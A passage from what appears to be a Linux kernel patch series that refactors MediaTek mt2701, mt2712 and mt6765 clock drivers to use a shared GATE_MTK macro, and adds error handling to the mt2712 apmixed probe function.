+ 	clks[IMX8ULP_CLK_SOSC_DIV2_GATE] = imx_clk_hw_gate_dis("sosc_div2_gate", "sosc", base + 0x108, 15);
+diff --git a/drivers/clk/mediatek/clk-mt2701-aud.c b/drivers/clk/mediatek/clk-mt2701-aud.c
+index 6ba398eb7df91..4287bd3f545ee 100644
+--- a/drivers/clk/mediatek/clk-mt2701-aud.c
++++ b/drivers/clk/mediatek/clk-mt2701-aud.c
+@@ -15,41 +15,17 @@
+ 
+ #include <dt-bindings/clock/mt2701-clk.h>
+ 
+-#define GATE_AUDIO0(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &audio0_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_no_setclr,	\
+-	}
++#define GATE_AUDIO0(_id, _name, _parent, _shift)		\
++	GATE_MTK(_id, _name, _parent, &audio0_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr)
+ 
+-#define GATE_AUDIO1(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &audio1_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_no_setclr,	\
+-	}
++#define GATE_AUDIO1(_id, _name, _parent, _shift)		\
++	GATE_MTK(_id, _name, _parent, &audio1_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr)
+ 
+-#define GATE_AUDIO2(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &audio2_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_no_setclr,	\
+-	}
++#define GATE_AUDIO2(_id, _name, _parent, _shift)		\
++	GATE_MTK(_id, _name, _parent, &audio2_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr)
+ 
+-#define GATE_AUDIO3(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &audio3_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_no_setclr,	\
+-	}
++#define GATE_AUDIO3(_id, _name, _parent, _shift)		\
++	GATE_MTK(_id, _name, _parent, &audio3_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr)
+ 
+ static const struct mtk_gate_regs audio0_cg_regs = {
+ 	.set_ofs = 0x0,
+diff --git a/drivers/clk/mediatek/clk-mt2701-bdp.c b/drivers/clk/mediatek/clk-mt2701-bdp.c
+index 435ed4819d563..b0f0572079452 100644
+--- a/drivers/clk/mediatek/clk-mt2701-bdp.c
++++ b/drivers/clk/mediatek/clk-mt2701-bdp.c
+@@ -24,23 +24,11 @@ static const struct mtk_gate_regs bdp1_cg_regs = {
+ 	.sta_ofs = 0x0110,
+ };
+ 
+-#define GATE_BDP0(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &bdp0_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr_inv,	\
+-	}
++#define GATE_BDP0(_id, _name, _parent, _shift)			\
++	GATE_MTK(_id, _name, _parent, &bdp0_cg_regs, _shift, &mtk_clk_gate_ops_setclr_inv)
+ 
+-#define GATE_BDP1(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &bdp1_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr_inv,	\
+-	}
++#define GATE_BDP1(_id, _name, _parent, _shift)			\
++	GATE_MTK(_id, _name, _parent, &bdp1_cg_regs, _shift, &mtk_clk_gate_ops_setclr_inv)
+ 
+ static const struct mtk_gate bdp_clks[] = {
+ 	GATE_BDP0(CLK_BDP_BRG_BA, "brg_baclk", "mm_sel", 0),
+diff --git a/drivers/clk/mediatek/clk-mt2701-eth.c b/drivers/clk/mediatek/clk-mt2701-eth.c
+index edf1e2ed2b596..601358748750e 100644
+--- a/drivers/clk/mediatek/clk-mt2701-eth.c
++++ b/drivers/clk/mediatek/clk-mt2701-eth.c
+@@ -16,14 +16,8 @@ static const struct mtk_gate_regs eth_cg_regs = {
+ 	.sta_ofs = 0x0030,
+ };
+ 
+-#define GATE_ETH(_id, _name, _parent, _shift) {		\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &eth_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_no_setclr_inv,	\
+-	}
++#define GATE_ETH(_id, _name, _parent, _shift)			\
++	GATE_MTK(_id, _name, _parent, &eth_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr_inv)
+ 
+ static const struct mtk_gate eth_clks[] = {
+ 	GATE_ETH(CLK_ETHSYS_HSDMA, "hsdma_clk", "ethif_sel", 5),
+diff --git a/drivers/clk/mediatek/clk-mt2701-g3d.c b/drivers/clk/mediatek/clk-mt2701-g3d.c
+index 1458109d99d94..8d1fc8e3336eb 100644
+--- a/drivers/clk/mediatek/clk-mt2701-g3d.c
++++ b/drivers/clk/mediatek/clk-mt2701-g3d.c
+@@ -16,14 +16,8 @@
+ 
+ #include <dt-bindings/clock/mt2701-clk.h>
+ 
+-#define GATE_G3D(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &g3d_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr,	\
+-	}
++#define GATE_G3D(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &g3d_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+ static const struct mtk_gate_regs g3d_cg_regs = {
+ 	.sta_ofs = 0x0,
+diff --git a/drivers/clk/mediatek/clk-mt2701-hif.c b/drivers/clk/mediatek/clk-mt2701-hif.c
+index 434cbbe8c0371..edeeb033a2350 100644
+--- a/drivers/clk/mediatek/clk-mt2701-hif.c
++++ b/drivers/clk/mediatek/clk-mt2701-hif.c
+@@ -16,14 +16,8 @@ static const struct mtk_gate_regs hif_cg_regs = {
+ 	.sta_ofs = 0x0030,
+ };
+ 
+-#define GATE_HIF(_id, _name, _parent, _shift) {		\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &hif_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_no_setclr_inv,	\
+-	}
++#define GATE_HIF(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &hif_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr_inv)
+ 
+ static const struct mtk_gate hif_clks[] = {
+ 	GATE_HIF(CLK_HIFSYS_USB0PHY, "usb0_phy_clk", "ethpll_500m_ck", 21),
+diff --git a/drivers/clk/mediatek/clk-mt2701-img.c b/drivers/clk/mediatek/clk-mt2701-img.c
+index 7e53deb7f9905..eb172473f0755 100644
+--- a/drivers/clk/mediatek/clk-mt2701-img.c
++++ b/drivers/clk/mediatek/clk-mt2701-img.c
+@@ -18,14 +18,8 @@ static const struct mtk_gate_regs img_cg_regs = {
+ 	.sta_ofs = 0x0000,
+ };
+ 
+-#define GATE_IMG(_id, _name, _parent, _shift) {		\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &img_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr,	\
+-	}
++#define GATE_IMG(_id, _name, _parent, _shift)			\
++	GATE_MTK(_id, _name, _parent, &img_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+ static const struct mtk_gate img_clks[] = {
+ 	GATE_IMG(CLK_IMG_SMI_COMM, "img_smi_comm", "mm_sel", 0),
+diff --git a/drivers/clk/mediatek/clk-mt2701-mm.c b/drivers/clk/mediatek/clk-mt2701-mm.c
+index 9ea7abad99d23..eb069f3bc9a2b 100644
+--- a/drivers/clk/mediatek/clk-mt2701-mm.c
++++ b/drivers/clk/mediatek/clk-mt2701-mm.c
+@@ -24,23 +24,11 @@ static const struct mtk_gate_regs disp1_cg_regs = {
+ 	.sta_ofs = 0x0110,
+ };
+ 
+-#define GATE_DISP0(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &disp0_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr,	\
+-	}
++#define GATE_DISP0(_id, _name, _parent, _shift)	\
++	GATE_MTK(_id, _name, _parent, &disp0_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+-#define GATE_DISP1(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &disp1_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr,	\
+-	}
++#define GATE_DISP1(_id, _name, _parent, _shift)	\
++	GATE_MTK(_id, _name, _parent, &disp1_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+ static const struct mtk_gate mm_clks[] = {
+ 	GATE_DISP0(CLK_MM_SMI_COMMON, "mm_smi_comm", "mm_sel", 0),
+diff --git a/drivers/clk/mediatek/clk-mt2701-vdec.c b/drivers/clk/mediatek/clk-mt2701-vdec.c
+index d3089da0ab62e..0f07c5d731df6 100644
+--- a/drivers/clk/mediatek/clk-mt2701-vdec.c
++++ b/drivers/clk/mediatek/clk-mt2701-vdec.c
+@@ -24,23 +24,11 @@ static const struct mtk_gate_regs vdec1_cg_regs = {
+ 	.sta_ofs = 0x0008,
+ };
+ 
+-#define GATE_VDEC0(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &vdec0_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr_inv,	\
+-	}
++#define GATE_VDEC0(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &vdec0_cg_regs, _shift, &mtk_clk_gate_ops_setclr_inv)
+ 
+-#define GATE_VDEC1(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &vdec1_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr_inv,	\
+-	}
++#define GATE_VDEC1(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &vdec1_cg_regs, _shift, &mtk_clk_gate_ops_setclr_inv)
+ 
+ static const struct mtk_gate vdec_clks[] = {
+ 	GATE_VDEC0(CLK_VDEC_CKGEN, "vdec_cken", "vdec_sel", 0),
+diff --git a/drivers/clk/mediatek/clk-mt2701.c b/drivers/clk/mediatek/clk-mt2701.c
+index 9b442af37e672..1c3a93143dc5e 100644
+--- a/drivers/clk/mediatek/clk-mt2701.c
++++ b/drivers/clk/mediatek/clk-mt2701.c
+@@ -636,14 +636,8 @@ static const struct mtk_gate_regs top_aud_cg_regs = {
+ 	.sta_ofs = 0x012C,
+ };
+ 
+-#define GATE_TOP_AUD(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &top_aud_cg_regs,		\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_no_setclr,	\
+-	}
++#define GATE_TOP_AUD(_id, _name, _parent, _shift)			\
++	GATE_MTK(_id, _name, _parent, &top_aud_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr)
+ 
+ static const struct mtk_gate top_clks[] = {
+ 	GATE_TOP_AUD(CLK_TOP_AUD_48K_TIMING, "a1sys_hp_ck", "aud_mux1_div",
+@@ -701,14 +695,8 @@ static const struct mtk_gate_regs infra_cg_regs = {
+ 	.sta_ofs = 0x0048,
+ };
+ 
+-#define GATE_ICG(_id, _name, _parent, _shift) {		\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &infra_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr,	\
+-	}
++#define GATE_ICG(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &infra_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+ static const struct mtk_gate infra_clks[] = {
+ 	GATE_ICG(CLK_INFRA_DBG, "dbgclk", "axi_sel", 0),
+@@ -822,23 +810,11 @@ static const struct mtk_gate_regs peri1_cg_regs = {
+ 	.sta_ofs = 0x001c,
+ };
+ 
+-#define GATE_PERI0(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &peri0_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr,	\
+-	}
++#define GATE_PERI0(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &peri0_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+-#define GATE_PERI1(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &peri1_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr,	\
+-	}
++#define GATE_PERI1(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &peri1_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+ static const struct mtk_gate peri_clks[] = {
+ 	GATE_PERI0(CLK_PERI_USB0_MCU, "usb0_mcu_ck", "axi_sel", 31),
+diff --git a/drivers/clk/mediatek/clk-mt2712-bdp.c b/drivers/clk/mediatek/clk-mt2712-bdp.c
+index 684d03e9f6de1..5e668651dd901 100644
+--- a/drivers/clk/mediatek/clk-mt2712-bdp.c
++++ b/drivers/clk/mediatek/clk-mt2712-bdp.c
+@@ -18,14 +18,8 @@ static const struct mtk_gate_regs bdp_cg_regs = {
+ 	.sta_ofs = 0x100,
+ };
+ 
+-#define GATE_BDP(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &bdp_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_no_setclr,	\
+-	}
++#define GATE_BDP(_id, _name, _parent, _shift)			\
++	GATE_MTK(_id, _name, _parent, &bdp_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr)
+ 
+ static const struct mtk_gate bdp_clks[] = {
+ 	GATE_BDP(CLK_BDP_BRIDGE_B, "bdp_bridge_b", "mm_sel", 0),
+diff --git a/drivers/clk/mediatek/clk-mt2712-img.c b/drivers/clk/mediatek/clk-mt2712-img.c
+index 335049cdc856c..3ffa51384e6b2 100644
+--- a/drivers/clk/mediatek/clk-mt2712-img.c
++++ b/drivers/clk/mediatek/clk-mt2712-img.c
+@@ -18,14 +18,8 @@ static const struct mtk_gate_regs img_cg_regs = {
+ 	.sta_ofs = 0x0,
+ };
+ 
+-#define GATE_IMG(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &img_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_no_setclr,	\
+-	}
++#define GATE_IMG(_id, _name, _parent, _shift)			\
++	GATE_MTK(_id, _name, _parent, &img_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr)
+ 
+ static const struct mtk_gate img_clks[] = {
+ 	GATE_IMG(CLK_IMG_SMI_LARB2, "img_smi_larb2", "mm_sel", 0),
+diff --git a/drivers/clk/mediatek/clk-mt2712-jpgdec.c b/drivers/clk/mediatek/clk-mt2712-jpgdec.c
+index 07ba7c5e80aff..8c768d5ce24d5 100644
+--- a/drivers/clk/mediatek/clk-mt2712-jpgdec.c
++++ b/drivers/clk/mediatek/clk-mt2712-jpgdec.c
+@@ -18,14 +18,8 @@ static const struct mtk_gate_regs jpgdec_cg_regs = {
+ 	.sta_ofs = 0x0,
+ };
+ 
+-#define GATE_JPGDEC(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &jpgdec_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr_inv,	\
+-	}
++#define GATE_JPGDEC(_id, _name, _parent, _shift)			\
++	GATE_MTK(_id, _name, _parent, &jpgdec_cg_regs, _shift, &mtk_clk_gate_ops_setclr_inv)
+ 
+ static const struct mtk_gate jpgdec_clks[] = {
+ 	GATE_JPGDEC(CLK_JPGDEC_JPGDEC1, "jpgdec_jpgdec1", "jpgdec_sel", 0),
+diff --git a/drivers/clk/mediatek/clk-mt2712-mfg.c b/drivers/clk/mediatek/clk-mt2712-mfg.c
+index 42f8cf3ecf4cb..8949315c2dd20 100644
+--- a/drivers/clk/mediatek/clk-mt2712-mfg.c
++++ b/drivers/clk/mediatek/clk-mt2712-mfg.c
+@@ -18,14 +18,8 @@ static const struct mtk_gate_regs mfg_cg_regs = {
+ 	.sta_ofs = 0x0,
+ };
+ 
+-#define GATE_MFG(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &mfg_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr,	\
+-	}
++#define GATE_MFG(_id, _name, _parent, _shift)			\
++	GATE_MTK(_id, _name, _parent, &mfg_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+ static const struct mtk_gate mfg_clks[] = {
+ 	GATE_MFG(CLK_MFG_BG3D, "mfg_bg3d", "mfg_sel", 0),
+diff --git a/drivers/clk/mediatek/clk-mt2712-mm.c b/drivers/clk/mediatek/clk-mt2712-mm.c
+index 7d44b09b8a0a7..ad6daa8f28a83 100644
+--- a/drivers/clk/mediatek/clk-mt2712-mm.c
++++ b/drivers/clk/mediatek/clk-mt2712-mm.c
+@@ -30,32 +30,14 @@ static const struct mtk_gate_regs mm2_cg_regs = {
+ 	.sta_ofs = 0x220,
+ };
+ 
+-#define GATE_MM0(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &mm0_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr,	\
+-	}
+-
+-#define GATE_MM1(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &mm1_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr,	\
+-	}
+-
+-#define GATE_MM2(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &mm2_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr,	\
+-	}
++#define GATE_MM0(_id, _name, _parent, _shift)	\
++	GATE_MTK(_id, _name, _parent, &mm0_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
++
++#define GATE_MM1(_id, _name, _parent, _shift)	\
++	GATE_MTK(_id, _name, _parent, &mm1_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
++
++#define GATE_MM2(_id, _name, _parent, _shift)	\
++	GATE_MTK(_id, _name, _parent, &mm2_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+ static const struct mtk_gate mm_clks[] = {
+ 	/* MM0 */
+diff --git a/drivers/clk/mediatek/clk-mt2712-vdec.c b/drivers/clk/mediatek/clk-mt2712-vdec.c
+index 6296ed5c5b555..572290dd43c87 100644
+--- a/drivers/clk/mediatek/clk-mt2712-vdec.c
++++ b/drivers/clk/mediatek/clk-mt2712-vdec.c
+@@ -24,23 +24,11 @@ static const struct mtk_gate_regs vdec1_cg_regs = {
+ 	.sta_ofs = 0x8,
+ };
+ 
+-#define GATE_VDEC0(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &vdec0_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr_inv,	\
+-	}
++#define GATE_VDEC0(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &vdec0_cg_regs, _shift, &mtk_clk_gate_ops_setclr_inv)
+ 
+-#define GATE_VDEC1(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &vdec1_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr_inv,	\
+-	}
++#define GATE_VDEC1(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &vdec1_cg_regs, _shift, &mtk_clk_gate_ops_setclr_inv)
+ 
+ static const struct mtk_gate vdec_clks[] = {
+ 	/* VDEC0 */
+diff --git a/drivers/clk/mediatek/clk-mt2712-venc.c b/drivers/clk/mediatek/clk-mt2712-venc.c
+index b9bfc35de629c..9588eb03016eb 100644
+--- a/drivers/clk/mediatek/clk-mt2712-venc.c
++++ b/drivers/clk/mediatek/clk-mt2712-venc.c
+@@ -18,14 +18,8 @@ static const struct mtk_gate_regs venc_cg_regs = {
+ 	.sta_ofs = 0x0,
+ };
+ 
+-#define GATE_VENC(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &venc_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr_inv,	\
+-	}
++#define GATE_VENC(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &venc_cg_regs, _shift, &mtk_clk_gate_ops_setclr_inv)
+ 
+ static const struct mtk_gate venc_clks[] = {
+ 	GATE_VENC(CLK_VENC_SMI_COMMON_CON, "venc_smi", "mm_sel", 0),
+diff --git a/drivers/clk/mediatek/clk-mt2712.c b/drivers/clk/mediatek/clk-mt2712.c
+index 56980dd6c2eaf..d6c2cc183b1a1 100644
+--- a/drivers/clk/mediatek/clk-mt2712.c
++++ b/drivers/clk/mediatek/clk-mt2712.c
+@@ -958,23 +958,11 @@ static const struct mtk_gate_regs top1_cg_regs = {
+ 	.sta_ofs = 0x424,
+ };
+ 
+-#define GATE_TOP0(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &top0_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_no_setclr,	\
+-	}
++#define GATE_TOP0(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &top0_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr)
+ 
+-#define GATE_TOP1(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &top1_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_no_setclr_inv,	\
+-	}
++#define GATE_TOP1(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &top1_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr_inv)
+ 
+ static const struct mtk_gate top_clks[] = {
+ 	/* TOP0 */
+@@ -998,14 +986,8 @@ static const struct mtk_gate_regs infra_cg_regs = {
+ 	.sta_ofs = 0x48,
+ };
+ 
+-#define GATE_INFRA(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &infra_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr,	\
+-	}
++#define GATE_INFRA(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &infra_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+ static const struct mtk_gate infra_clks[] = {
+ 	GATE_INFRA(CLK_INFRA_DBGCLK, "infra_dbgclk", "axi_sel", 0),
+@@ -1035,32 +1017,14 @@ static const struct mtk_gate_regs peri2_cg_regs = {
+ 	.sta_ofs = 0x42c,
+ };
+ 
+-#define GATE_PERI0(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &peri0_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr,	\
+-	}
++#define GATE_PERI0(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &peri0_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+-#define GATE_PERI1(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &peri1_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr,	\
+-	}
++#define GATE_PERI1(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &peri1_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+-#define GATE_PERI2(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &peri2_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_no_setclr_inv,	\
+-	}
++#define GATE_PERI2(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &peri2_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr_inv)
+ 
+ static const struct mtk_gate peri_clks[] = {
+ 	/* PERI0 */
+@@ -1283,15 +1247,25 @@ static int clk_mt2712_apmixed_probe(struct platform_device *pdev)
+ 	struct device_node *node = pdev->dev.of_node;
+ 
+ 	clk_data = mtk_alloc_clk_data(CLK_APMIXED_NR_CLK);
++	if (!clk_data)
++		return -ENOMEM;
+ 
+-	mtk_clk_register_plls(node, plls, ARRAY_SIZE(plls), clk_data);
++	r = mtk_clk_register_plls(node, plls, ARRAY_SIZE(plls), clk_data);
++	if (r)
++		goto free_clk_data;
+ 
+ 	r = of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
++	if (r) {
++		dev_err(&pdev->dev, "Cannot register clock provider: %d\n", r);
++		goto unregister_plls;
++	}
+ 
+-	if (r != 0)
+-		pr_err("%s(): could not register clock provider: %d\n",
+-			__func__, r);
++	return 0;
+ 
++unregister_plls:
++	mtk_clk_unregister_plls(plls, ARRAY_SIZE(plls), clk_data);
++free_clk_data:
++	mtk_free_clk_data(clk_data);
+ 	return r;
+ }
+ 
+diff --git a/drivers/clk/mediatek/clk-mt6765-audio.c b/drivers/clk/mediatek/clk-mt6765-audio.c
+index 0aa6c0d352ca5..5682e0302eee2 100644
+--- a/drivers/clk/mediatek/clk-mt6765-audio.c
++++ b/drivers/clk/mediatek/clk-mt6765-audio.c
+@@ -24,23 +24,11 @@ static const struct mtk_gate_regs audio1_cg_regs = {
+ 	.sta_ofs = 0x4,
+ };
+ 
+-#define GATE_AUDIO0(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &audio0_cg_regs,		\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_no_setclr,	\
+-	}
++#define GATE_AUDIO0(_id, _name, _parent, _shift)		\
++	GATE_MTK(_id, _name, _parent, &audio0_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr)
+ 
+-#define GATE_AUDIO1(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &audio1_cg_regs,		\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_no_setclr,	\
+-	}
++#define GATE_AUDIO1(_id, _name, _parent, _shift)		\
++	GATE_MTK(_id, _name, _parent, &audio1_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr)
+ 
+ static const struct mtk_gate audio_clks[] = {
+ 	/* AUDIO0 */
+diff --git a/drivers/clk/mediatek/clk-mt6765-cam.c b/drivers/clk/mediatek/clk-mt6765-cam.c
+index 25f2bef38126e..6e7d192c19cb0 100644
+--- a/drivers/clk/mediatek/clk-mt6765-cam.c
++++ b/drivers/clk/mediatek/clk-mt6765-cam.c
+@@ -18,14 +18,8 @@ static const struct mtk_gate_regs cam_cg_regs = {
+ 	.sta_ofs = 0x0,
+ };
+ 
+-#define GATE_CAM(_id, _name, _parent, _shift) {		\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &cam_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr,	\
+-	}
++#define GATE_CAM(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &cam_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+ static const struct mtk_gate cam_clks[] = {
+ 	GATE_CAM(CLK_CAM_LARB3, "cam_larb3", "mm_ck", 0),
+diff --git a/drivers/clk/mediatek/clk-mt6765-img.c b/drivers/clk/mediatek/clk-mt6765-img.c
+index a62303ef4f41d..cfbc907988aff 100644
+--- a/drivers/clk/mediatek/clk-mt6765-img.c
++++ b/drivers/clk/mediatek/clk-mt6765-img.c
+@@ -18,14 +18,8 @@ static const struct mtk_gate_regs img_cg_regs = {
+ 	.sta_ofs = 0x0,
+ };
+ 
